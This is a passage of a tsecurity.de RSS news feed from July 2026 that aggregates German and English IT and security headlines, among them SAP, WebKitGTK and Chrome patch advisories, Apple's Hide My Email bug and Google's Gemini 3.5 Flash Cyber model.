<content:encoded><![CDATA[Pixel Watch-Nutzer*innen beschwerten sich in letzter Zeit über ein nerviges Problem mit Express Pay. Jetzt reagiert Google.]]></content:encoded>
</item>
<item>
<title><![CDATA[NetWeaver-Schwachstelle führt zu Speicherbeschädigung und schlimmer]]></title>
<description><![CDATA[SAP behebt drei kritische Schwachstellen in NetWeaver, Approuter und Commerce Cloud. Die Folgen reichen von Speicherbeschädigung und Datenzugriff bis zur Anmeldung mit bekannten Standardzugangsdaten.]]></description>
<link>https://tsecurity.de/de/3690746/it-security-nachrichten/netweaver-schwachstelle-fuehrt-zu-speicherbeschaedigung-und-schlimmer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690746/it-security-nachrichten/netweaver-schwachstelle-fuehrt-zu-speicherbeschaedigung-und-schlimmer/</guid>
<pubDate>Fri, 24 Jul 2026 07:15:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[SAP behebt drei kritische Schwachstellen in NetWeaver, Approuter und Commerce Cloud. Die Folgen reichen von Speicherbeschädigung und Datenzugriff bis zur Anmeldung mit bekannten Standardzugangsdaten.]]></content:encoded>
</item>
<item>
<title><![CDATA[Nvidia Geforce Hotfix 610.82: Neuer Treiber behebt Problem mit Halo: Campaign Evolved]]></title>
<description><![CDATA[Der Nvidia GeForce Hotfix-Treiber 610.82 behebt Fehler in zwei Spielen: Halo: Combat Evolved läuft auf RTX-50-Grafikkarten nun stabiler und Path of Exile 2 sollte bei langen Spielsessions unter DirectX 12 keine Aussetzer mehr zeigen. Ein Problem mit Battlefield 6 besteht jedoch weiterhin.]]></description>
<link>https://tsecurity.de/de/3689751/it-nachrichten/nvidia-geforce-hotfix-61082-neuer-treiber-behebt-problem-mit-halo-campaign-evolved/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689751/it-nachrichten/nvidia-geforce-hotfix-61082-neuer-treiber-behebt-problem-mit-halo-campaign-evolved/</guid>
<pubDate>Thu, 23 Jul 2026 18:53:36 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://pics.computerbase.de/1/2/3/9/4/3-1f959f56decd4892/article-640x360.5292c029.jpg"><p>Der Nvidia GeForce Hotfix-Treiber 610.82 behebt Fehler in zwei Spielen: Halo: Combat Evolved läuft auf RTX-50-Grafikkarten nun stabiler und Path of Exile 2 sollte bei langen Spielsessions unter DirectX 12 keine Aussetzer mehr zeigen. Ein Problem mit Battlefield 6 besteht jedoch weiterhin.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[DSA-6398-1 webkit2gtk - security update]]></title>
<description><![CDATA[The following vulnerabilities have been discovered in the WebKitGTK
web engine:

CVE-2024-4367

    Thomas Rinsma discovered that a type check was missing when
    handling fonts in PDF.js, which would allow arbitrary JavaScript
    execution in the PDF.js context.

CVE-2026-28847

    DARKNAVY, ...]]></description>
<link>https://tsecurity.de/de/3689735/unix-server/dsa-6398-1-webkit2gtk-security-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689735/unix-server/dsa-6398-1-webkit2gtk-security-update/</guid>
<pubDate>Thu, 23 Jul 2026 18:51:47 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The following vulnerabilities have been discovered in the WebKitGTK
web engine:
<p>
CVE-2024-4367
</p><p>
    Thomas Rinsma discovered that a type check was missing when
    handling fonts in PDF.js, which would allow arbitrary JavaScript
    execution in the PDF.js context.
</p><p>
CVE-2026-28847
</p><p>
    DARKNAVY, an anonymous researcher and Daniel Rhea discovered that
    processing maliciously crafted web content may lead to an
    unexpected process crash.
</p><p>
CVE-2026-28883
</p><p>
    Kwak Kiyong discovered that processing maliciously crafted web
    content may lead to an unexpected process crash.
</p><p>
CVE-2026-28901
</p><p>
    Joshua Rogers, Luigino Camastra, Igor Morgenstern, Guido Vranken,
    Maher Azzouzi and Ngan Nguyen discovered that processing
    maliciously crafted web content may lead to an unexpected process
    crash.
</p><p>
CVE-2026-28902
</p><p>
    Tristan Madani and Nathaniel Oh discovered that processing
    maliciously crafted web content may lead to an unexpected process
    crash.
</p><p>
CVE-2026-28903
</p><p>
    Mateusz Krzywicki discovered that processing maliciously crafted
    web content may lead to an unexpected process crash.
</p><p>
CVE-2026-28904
</p><p>
    Luka Racki discovered that processing maliciously crafted web
    content may lead to an unexpected process crash.
</p><p>
CVE-2026-28905
</p><p>
    Yuhao Hu, Yuanming Lai, Chenggang Wu, and Zhe Wang discovered that
    processing maliciously crafted web content may lead to an
    unexpected process crash.
</p><p>
CVE-2026-28907
</p><p>
    Cantina discovered that processing maliciously crafted web content
    may prevent Content Security Policy from being enforced.
</p><p>
CVE-2026-28942
</p><p>
    Milad Nasr and Nicholas Carlini discovered that processing
    maliciously crafted web content may lead to an unexpected Safari
    crash.
</p><p>
CVE-2026-28946
</p><p>
    Gia Bui, dr3dd, and w0wbox discovered that processing maliciously
    crafted web content may lead to an unexpected Safari crash.
</p><p>
CVE-2026-28947
</p><p>
    dr3dd discovered that processing maliciously crafted web content
    may lead to an unexpected Safari crash.
</p><p>
CVE-2026-28953
</p><p>
    Maher Azzouzi discovered that processing maliciously crafted web
    content may lead to an unexpected process crash.
</p><p>
CVE-2026-28955
</p><p>
    wac and Kookhwan Lee discovered that processing maliciously
    crafted web content may lead to an unexpected process crash.
</p><p>
CVE-2026-28958
</p><p>
    Cantina discovered that an app may be able to access sensitive
    user data.
</p><p>
CVE-2026-39872
</p><p>
    Utkarsh Pal and Ignacio Sanmillan discovered that processing
    maliciously crafted web content may lead to an unexpected process
    crash.
</p><p>
CVE-2026-43658
</p><p>
    Do Young Park discovered that processing maliciously crafted web
    content may lead to an unexpected Safari crash.
</p><p>
CVE-2026-43660
</p><p>
    Cantina discovered that processing maliciously crafted web content
    may prevent Content Security Policy from being enforced.
</p><p>
CVE-2026-43663
</p><p>
    Soyeon Park, Amy Burnett, Khai Tran, sherkito, Kota Toda,
    HexRabbit, NiNi, Tristan Madani and Brian Carpenter discovered
    that processing maliciously crafted web content may lead to an
    unexpected process crash.
</p><p>
CVE-2026-43676
</p><p>
    Mateusz Krzywicki, dr3dd, and Tommy DeVoss discovered that
    processing maliciously crafted web content may lead to an
    unexpected process crash.
</p><p>
CVE-2026-43699
</p><p>
    Tommy DeVoss discovered that processing maliciously crafted web
    content may lead to an unexpected process crash.
</p><p>
CVE-2026-43701
</p><p>
    Aaron Grattafiori discovered that a malicious website may be able
    to process restricted web content outside the sandbox.
</p><p>
CVE-2026-43705
</p><p>
    dr3dd discovered that processing maliciously crafted web content
    may lead to memory corruption.
</p><p>
CVE-2026-43707
</p><p>
    Amy Burnett discovered that processing maliciously crafted web
    content may lead to an unexpected process crash.
</p><p>
CVE-2026-43712
</p><p>
    Kwak Kiyong, Song Nuri, and Tristan Madani discovered that
    processing maliciously crafted web content may lead to an
    unexpected process crash.
</p><p>
CVE-2026-43713
</p><p>
    Jody Ritonga discovered that visiting a website may leak sensitive
    data.
</p><p>
CVE-2026-43715
</p><p>
    Milad Nasr and Nicholas Carlini discovered that processing
    maliciously crafted web content may lead to memory corruption.
</p><p>
CVE-2026-43716
</p><p>
    Tuan, Duc, Amy Burnett and Evan Lambert discovered that processing
    maliciously crafted web content may lead to an unexpected process
    crash.
</p><p>
CVE-2026-43720
</p><p>
    Gia Bui and Josef Korbel discovered that processing maliciously
    crafted web content may lead to an unexpected process crash.
</p><p>
CVE-2026-43721
</p><p>
    Idan Masas discovered that a malicious website may be able to
    silently hijack clipboard data.
</p><p>
CVE-2026-43725
</p><p>
    Luke Francis discovered that a malicious website may be able to
    process restricted web content outside the sandbox.
</p><p>
CVE-2026-43726
</p><p>
    Josef Korbel, Tristan Madani, Gia Bui and Narendra Singh
    discovered that processing maliciously crafted web content may
    lead to an unexpected process crash.
</p><p>
CVE-2026-43727
</p><p>
    Tommy DeVoss, Gia Bui and Gurpreet Shergill discovered that
    processing maliciously crafted web content may lead to an
    unexpected process crash.
</p><p>
CVE-2026-43731
</p><p>
    dr3dd discovered that processing maliciously crafted web content
    may lead to memory corruption.
</p><p>
CVE-2026-43732
</p><p>
    Nan Wang discovered that processing maliciously crafted web
    content may disclose sensitive user information.
</p><p>
CVE-2026-43734
</p><p>
    Jonathan Alush-Aben discovered that processing maliciously crafted
    web content may lead to an unexpected process crash.
</p><p>
CVE-2026-43740
</p><p>
    Nathaniel Oh and Arni Hardarson discovered that processing
    maliciously crafted web content may result in the disclosure of
    process memory.
</p><p>
CVE-2026-43742
</p><p>
    Yulia Mertsalova discovered that processing maliciously crafted
    web content may lead to an unexpected process crash.
</p><p>
CVE-2026-43745
</p><p>
    Amy Burnett and Khai Tran discovered that processing maliciously
    crafted web content may lead to an unexpected process crash.

</p><p>
<a href="https://security-tracker.debian.org/tracker/DSA-6398-1">https://security-tracker.debian.org/tracker/DSA-6398-1</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome Now Supports Netflix Streaming in 4K on Windows 11]]></title>
<description><![CDATA[Google Chrome has started supporting Netflix playback in 4K Ultra HD on compatible Windows 11 computers, giving users another way to stream at the platform’s highest resolution.




https://twitter.com/saurax04/status/2080317848677957869




Netflix previously limited Chrome playback on Windows t...]]></description>
<link>https://tsecurity.de/de/3689628/ios-mac-os/chrome-now-supports-netflix-streaming-in-4k-on-windows-11/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689628/ios-mac-os/chrome-now-supports-netflix-streaming-in-4k-on-windows-11/</guid>
<pubDate>Thu, 23 Jul 2026 18:03:34 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Google Chrome has started supporting Netflix playback in 4K Ultra HD on compatible Windows 11 computers, giving users another way to stream at the platform’s highest resolution.




https://twitter.com/saurax04/status/2080317848677957869




Netflix previously limited Chrome playback on Windows to lower resolutions, while users generally relied on Microsoft Edge or the Windows app for 4K streaming. Its updated system requirements now list Chrome 117 or later as supporting up to Ultra HD 2160p on Windows.



However, installing the latest Chrome version does not guarantee 4K playback. Users need Windows 11 with current updates, a Netflix plan that includes Ultra HD and a steady internet connection of at least 15 Mbps.



The computer must also have compatible graphics hardware, such as an Nvidia GeForce GTX 1050 or newer, an AMD Radeon RX 400 series or newer, or a supported Intel or AMD processor. Some systems also require the HEVC video extension.



Display requirements still apply



Netflix requires a 4K display running at 60Hz. External screens must use an HDCP 2.2-compatible connection, and every active connected display must meet the same requirements.



Users should also set Netflix playback quality to Auto or High and choose a title carrying the 4K label. Chrome on macOS remains limited to 1080p, while Safari supports 4K on compatible Macs.]]></content:encoded>
</item>
<item>
<title><![CDATA[Fritzbox-Besitzer aufgepasst: Update behebt DSL-Drosselung auf 10 Mbit/s]]></title>
<description><![CDATA[Fritz hat mit FritzOS 8.26 ein Firmware-Update für die Fritzbox 7510 bereitgestellt, das einen Fehler bei DSL-Verbindungen beheben soll. Außerdem enthält die Aktualisierung allgemeine Verbesserungen der Systemstabilität.weiterlesen auf t3n.de]]></description>
<link>https://tsecurity.de/de/3689125/it-nachrichten/fritzbox-besitzer-aufgepasst-update-behebt-dsl-drosselung-auf-10-mbits/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689125/it-nachrichten/fritzbox-besitzer-aufgepasst-update-behebt-dsl-drosselung-auf-10-mbits/</guid>
<pubDate>Thu, 23 Jul 2026 15:06:25 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Fritz hat mit FritzOS 8.26 ein Firmware-Update für die Fritzbox 7510 bereitgestellt, das einen Fehler bei DSL-Verbindungen beheben soll. Außerdem enthält die Aktualisierung allgemeine Verbesserungen der Systemstabilität.<a href="https://t3n.de/news/fritzbox-7510-update-behebt-dsl-drosselung-1753959/?utm_source=rss&amp;utm_medium=newsFeed&amp;utm_campaign=newsFeed">weiterlesen auf t3n.de</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Schlechter Empfang im Büro oder Keller? Eine einzige Handy-Einstellung löst das Problem]]></title>
<description><![CDATA[Dicke Wände, Tiefgarage, Untergeschoss und das Handy zeigt nur noch einen Balken. Dabei steckt in jedem modernen iPhone und Android-Smartphone eine Funktion, die genau dieses Problem behebt. Ihr müsst sie nur einmal aktivieren. Wir zeigen euch, wie das geht und worauf ihr dabei unbedingt achten s...]]></description>
<link>https://tsecurity.de/de/3688252/it-nachrichten/schlechter-empfang-im-buero-oder-keller-eine-einzige-handy-einstellung-loest-das-problem/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688252/it-nachrichten/schlechter-empfang-im-buero-oder-keller-eine-einzige-handy-einstellung-loest-das-problem/</guid>
<pubDate>Thu, 23 Jul 2026 09:18:23 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Dicke Wände, Tiefgarage, Untergeschoss und das Handy zeigt nur noch einen Balken. Dabei steckt in jedem modernen iPhone und Android-Smartphone eine Funktion, die genau dieses Problem behebt. Ihr müsst sie nur einmal aktivieren. Wir zeigen euch, wie das geht und worauf ihr dabei unbedingt achten solltet.]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple behebt Bug in „Hide My Email“: Reale Adressen landeten in Mail-Logs]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – Apple hat einen Fehler im Dienst „Hide My Email“ behoben, der es ermöglicht haben soll, reale E-Mail-Adressen hinter den anonymisierten Aliasen offenzulegen. Die Schwachstelle wurde über einen längeren Zeitraum entdeckt und blieb länger als ein Jahr wirksam, bevor der Patch...]]></description>
<link>https://tsecurity.de/de/3687411/it-security-nachrichten/apple-behebt-bug-in-hide-my-email-reale-adressen-landeten-in-mail-logs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687411/it-security-nachrichten/apple-behebt-bug-in-hide-my-email-reale-adressen-landeten-in-mail-logs/</guid>
<pubDate>Wed, 22 Jul 2026 21:10:19 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-hide-my-email-bug-fix-mail-logs.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-hide-my-email-bug-fix-mail-logs.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-hide-my-email-bug-fix-mail-logs-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-hide-my-email-bug-fix-mail-logs-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-hide-my-email-bug-fix-mail-logs-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-hide-my-email-bug-fix-mail-logs-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-hide-my-email-bug-fix-mail-logs-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – Apple hat einen Fehler im Dienst „Hide My Email“ behoben, der es ermöglicht haben soll, reale E-Mail-Adressen hinter den anonymisierten Aliasen offenzulegen. Die Schwachstelle wurde über einen längeren Zeitraum entdeckt und blieb länger als ein Jahr wirksam, bevor der Patch ausgerollt wurde. Betroffen war offenbar insbesondere ein Szenario, in dem gezielt […]</p>
<div><a href="https://www.it-boltwise.de/apple-behebt-bug-in-hide-my-email-reale-adressen-landeten-in-mail-logs.html">... den vollständigen Artikel <strong>»Apple behebt Bug in „Hide My Email“: Reale Adressen landeten in Mail-Logs«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/apple-behebt-bug-in-hide-my-email-reale-adressen-landeten-in-mail-logs.html">Apple behebt Bug in „Hide My Email“: Reale Adressen landeten in Mail-Logs</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Gemini 3.5 Flash Cyber: Google stellt KI-Agent für schnelle Patch-Reparaturen bereit]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – Google bringt mit Gemini 3.5 Flash Cyber eine spezialisierte Künstliche-Intelligenz-Komponente an den Start, die Softwarelücken in Code entdeckt, validiert und zügig behebt. Im Fokus steht ein entkoppelter Weg über den KI-Agent CodeMender: zunächst im begrenzten Pilot für R...]]></description>
<link>https://tsecurity.de/de/3687095/it-security-nachrichten/gemini-35-flash-cyber-google-stellt-ki-agent-fuer-schnelle-patch-reparaturen-bereit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687095/it-security-nachrichten/gemini-35-flash-cyber-google-stellt-ki-agent-fuer-schnelle-patch-reparaturen-bereit/</guid>
<pubDate>Wed, 22 Jul 2026 19:11:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-gemini-flash-cyber-patching-agent.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-gemini-flash-cyber-patching-agent.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-gemini-flash-cyber-patching-agent-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-gemini-flash-cyber-patching-agent-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-gemini-flash-cyber-patching-agent-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-gemini-flash-cyber-patching-agent-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-gemini-flash-cyber-patching-agent-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – Google bringt mit Gemini 3.5 Flash Cyber eine spezialisierte Künstliche-Intelligenz-Komponente an den Start, die Softwarelücken in Code entdeckt, validiert und zügig behebt. Im Fokus steht ein entkoppelter Weg über den KI-Agent CodeMender: zunächst im begrenzten Pilot für Regierungen und ausgewählte Partner. In Tests wurden bei definierten Durchläufen 55 neue bestätigte Probleme […]</p>
<div><a href="https://www.it-boltwise.de/gemini-3-5-flash-cyber-google-stellt-ki-agent-fuer-schnelle-patch-reparaturen-bereit.html">... den vollständigen Artikel <strong>»Gemini 3.5 Flash Cyber: Google stellt KI-Agent für schnelle Patch-Reparaturen bereit«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/gemini-3-5-flash-cyber-google-stellt-ki-agent-fuer-schnelle-patch-reparaturen-bereit.html">Gemini 3.5 Flash Cyber: Google stellt KI-Agent für schnelle Patch-Reparaturen bereit</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple schließt Sicherheitslücke in Hide My Email]]></title>
<description><![CDATA[Apple behebt einen Fehler im Dienst Hide My Email. Durch einen Fehler beim Umgang mit Spam-Mails wurden echte E-Mail-Adressen in Server-Logs offengelegt.

Tags: #Apple | #Cyber Security | #E-Mail]]></description>
<link>https://tsecurity.de/de/3687005/it-security-nachrichten/apple-schliesst-sicherheitsluecke-in-hide-my-email/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687005/it-security-nachrichten/apple-schliesst-sicherheitsluecke-in-hide-my-email/</guid>
<pubDate>Wed, 22 Jul 2026 18:27:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1920" height="1080" src="https://www.it-daily.net/wp-content/uploads/2024/07/Apple-Security-Quelle-rafapress-Shutterstock-2145743281-1920.jpg" class="attachment-full size-full wp-post-image" alt="Apple Security" decoding="async" srcset="https://www.it-daily.net/wp-content/uploads/2024/07/Apple-Security-Quelle-rafapress-Shutterstock-2145743281-1920.jpg 1920w, https://www.it-daily.net/wp-content/uploads/2024/07/Apple-Security-Quelle-rafapress-Shutterstock-2145743281-1920-300x169.jpg 300w, https://www.it-daily.net/wp-content/uploads/2024/07/Apple-Security-Quelle-rafapress-Shutterstock-2145743281-1920-1024x576.jpg 1024w, https://www.it-daily.net/wp-content/uploads/2024/07/Apple-Security-Quelle-rafapress-Shutterstock-2145743281-1920-768x432.jpg 768w, https://www.it-daily.net/wp-content/uploads/2024/07/Apple-Security-Quelle-rafapress-Shutterstock-2145743281-1920-1536x864.jpg 1536w" sizes="(max-width: 1920px) 100vw, 1920px" title="Apple schließt Sicherheitslücke in Hide My Email 1"></p>
    Apple behebt einen Fehler im Dienst Hide My Email. Durch einen Fehler beim Umgang mit Spam-Mails wurden echte E-Mail-Adressen in Server-Logs offengelegt.

<p>Tags: <a href="https://www.it-daily.net/thema/apple">#Apple</a> | <a href="https://www.it-daily.net/thema/cyber-security">#Cyber Security</a> | <a href="https://www.it-daily.net/thema/e-mail">#E-Mail</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple behebt "Meine E-Mail-Adresse verbergen"-Sicherheitsproblem]]></title>
<description><![CDATA[Im Juli 2026 hat Apple eine Schwachstelle in der Funktion "E-Mail-Adresse verbergen" behoben. Unter bestimmten Umständen wurden jedoch die echten Kontaktdaten der Nutzer offengelegt. Bei Anmeldungen generiert das System eine zufällige Adresse.			(Weiter lesen)]]></description>
<link>https://tsecurity.de/de/3686986/it-security-nachrichten/apple-behebt-meine-e-mail-adresse-verbergen-sicherheitsproblem/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686986/it-security-nachrichten/apple-behebt-meine-e-mail-adresse-verbergen-sicherheitsproblem/</guid>
<pubDate>Wed, 22 Jul 2026 18:20:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://winfuture.de/news,160143.html"><img hspace="5" border="0" align="left" alt="App, Software, Apps, E-Mail, App Store, Programm, Apple Mail" width="1920" height="1080" src="https://i.wfcdn.de/teaser/1920/78827.jpg"></a>
			Im Juli 2026 hat <a href="https://winfuture.de/special/apple/" title="Apple Special">Apple</a> eine Schwachstelle in der Funktion "E-Mail-Adresse verbergen" behoben. Unter bestimmten Umständen wurden jedoch die echten Kontaktdaten der Nutzer offengelegt. Bei Anmeldungen generiert das System eine zufällige Adresse.			(<a href="https://winfuture.de/news,160143.html">Weiter lesen</a>)]]></content:encoded>
</item>
<item>
<title><![CDATA[The browser wars aren’t about search anymore — here are the best alternatives to Chrome and Safari]]></title>
<description><![CDATA[We’ve compiled an overview of some of the top alternative browsers available today aiming to challenge Chrome and Safari.]]></description>
<link>https://tsecurity.de/de/3686468/it-nachrichten/the-browser-wars-arent-about-search-anymore-here-are-the-best-alternatives-to-chrome-and-safari/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686468/it-nachrichten/the-browser-wars-arent-about-search-anymore-here-are-the-best-alternatives-to-chrome-and-safari/</guid>
<pubDate>Wed, 22 Jul 2026 15:21:05 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[We’ve compiled an overview of some of the top alternative browsers available today aiming to challenge Chrome and Safari.]]></content:encoded>
</item>
<item>
<title><![CDATA[Google stellt Spezialmodell Gemini 3.5 Flash Cyber vor]]></title>
<description><![CDATA[Google DeepMind stellt Gemini 3.5 Flash Cyber vor. Das Spezialmodell entdeckt und behebt Schwachstellen im Quellcode für Regierungen und Partner.

Tags: #Cyber Security | #Google | #Künstliche Intelligenz]]></description>
<link>https://tsecurity.de/de/3686195/it-security-nachrichten/google-stellt-spezialmodell-gemini-35-flash-cyber-vor/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686195/it-security-nachrichten/google-stellt-spezialmodell-gemini-35-flash-cyber-vor/</guid>
<pubDate>Wed, 22 Jul 2026 13:59:01 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1920" height="1080" src="https://www.it-daily.net/wp-content/uploads/2025/03/Google-Gemini-Quelle-mundissima-Shutterstock-2526762697-1920.jpg" class="attachment-full size-full wp-post-image" alt="Google Gemini" decoding="async" srcset="https://www.it-daily.net/wp-content/uploads/2025/03/Google-Gemini-Quelle-mundissima-Shutterstock-2526762697-1920.jpg 1920w, https://www.it-daily.net/wp-content/uploads/2025/03/Google-Gemini-Quelle-mundissima-Shutterstock-2526762697-1920-300x169.jpg 300w, https://www.it-daily.net/wp-content/uploads/2025/03/Google-Gemini-Quelle-mundissima-Shutterstock-2526762697-1920-1024x576.jpg 1024w, https://www.it-daily.net/wp-content/uploads/2025/03/Google-Gemini-Quelle-mundissima-Shutterstock-2526762697-1920-768x432.jpg 768w, https://www.it-daily.net/wp-content/uploads/2025/03/Google-Gemini-Quelle-mundissima-Shutterstock-2526762697-1920-1536x864.jpg 1536w" sizes="(max-width: 1920px) 100vw, 1920px" title="Google stellt Spezialmodell Gemini 3.5 Flash Cyber vor 1"></p>
    Google DeepMind stellt Gemini 3.5 Flash Cyber vor. Das Spezialmodell entdeckt und behebt Schwachstellen im Quellcode für Regierungen und Partner.

<p>Tags: <a href="https://www.it-daily.net/thema/cyber-security">#Cyber Security</a> | <a href="https://www.it-daily.net/thema/google">#Google</a> | <a href="https://www.it-daily.net/thema/kuenstliche-intelligenz">#Künstliche Intelligenz</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google behebt hochriskante Schwachstellen in Chrome]]></title>
<description><![CDATA[In den neuen Chrome-Versionen 150.0.7871.181/182 für Windows und macOS sowie 150.0.7871.181 für Linux vom 21. Juli haben die Entwickler 12 Schwachstellen beseitigt. Keine der geschlossenen Lücken wird laut Google bislang für Angriffe ausgenutzt. Die Hersteller anderer Chromium-basierter Browser w...]]></description>
<link>https://tsecurity.de/de/3685550/it-nachrichten/google-behebt-hochriskante-schwachstellen-in-chrome/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685550/it-nachrichten/google-behebt-hochriskante-schwachstellen-in-chrome/</guid>
<pubDate>Wed, 22 Jul 2026 09:51:10 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>In den neuen Chrome-Versionen 150.0.7871.181/182 für Windows und macOS sowie 150.0.7871.181 für Linux vom 21. Juli haben die Entwickler 12 Schwachstellen beseitigt. Keine der geschlossenen Lücken wird laut Google bislang für Angriffe ausgenutzt. Die Hersteller anderer Chromium-basierter Browser werden in Kürze nachziehen.</p>



<p>Im <a href="https://chromereleases.googleblog.com/" target="_blank" rel="noreferrer noopener">Chrome Release Blog</a> führt Daniel Yip 12 beseitigte Sicherheitslücken auf, die alle als hohes Risiko eingestuft sind. Er gibt an, Google habe alle Schwachstellen bis auf zwei selbst entdeckt. Die Sicherheitslücken CVE-2026-16420 und -16421 sind durch externe Sicherheitsforscher aufgespürt und gemeldet worden. Es handelt sich um Fehler in der WebAudio-Komponente. Google spendiert für jede der beiden Lücken 500 US-Dollar Prämie. Die verbleibenden Schwachstellen sind eine bunte Mischung gängiger Fehlerquellen, diesmal sind nur zwei Use-after-free-Lücken (UAF) darunter.</p>



<p><a href="https://www.pcwelt.de/article/1197811/die-neuesten-sicherheits-updates.html" target="_blank" rel="noreferrer noopener">▶Die neuesten Sicherheits-Updates</a></p>



<p>In der Vorwoche hat Google erneut <a href="https://www.pcwelt.de/article/3194106/zweites-chrome-update-in-dieser-woche-stopft-kritische-browser-lucken.html" target="_blank" rel="noreferrer noopener">zwei Updates ausgeliefert</a> und damit insgesamt 22 teils als kritisch eingestufte Sicherheitslücken geschlossen. In aller Regel aktualisiert sich Chrome automatisch, wenn eine neue Version verfügbar ist. Mit dem Menü-Eintrag <em>» Hilfe » Über Google Chrome</em> können Sie die Update-Prüfung manuell anstoßen.</p>



<p>Google hat am 21. Juli auch Chrome für Android 150.0.7871.181 sowie Chrome für iOS 151.0.7922.43 bereitgestellt. In der Android-Version sind die gleichen Schwachstellen beseitigt wie in den Desktop-Ausgaben. Der Extended Stable Channel für Windows und macOS enthält nun die Chromium-Version 150.0.7871.182. Die Freigabe der Chrome-Version 151 ist für den 28. Juli geplant.</p>



<p><strong>Tipp:</strong> Unabhängig davon, dass Sie Ihren Browser stets aktuell halten, sollten Sie die Sicherheit Ihres PCs zusätzlich mit geeigneter Antivirus-Software verbessern. Gute Antivirus-Lösungen stellen wir in „<a href="https://www.pcwelt.de/article/2255713/test-bestes-antivirus-programm-windows.html" target="_blank" rel="noreferrer noopener">Die besten Antivirus-Programme 2025 im Test: So schützen Sie Ihren Windows-PC</a>“ vor. Falls Sie großen Wert auf anonymes Surfen legen, <a href="https://www.pcwelt.de/article/1193534/die-besten-vpn-dienste-im-vergleich.html" target="_blank" rel="noreferrer noopener">sind wiederum gute VPN-Programme einen Blick wert.</a></p>



<h2 class="wp-block-heading toc">Andere Chromium-basierte Browser</h2>



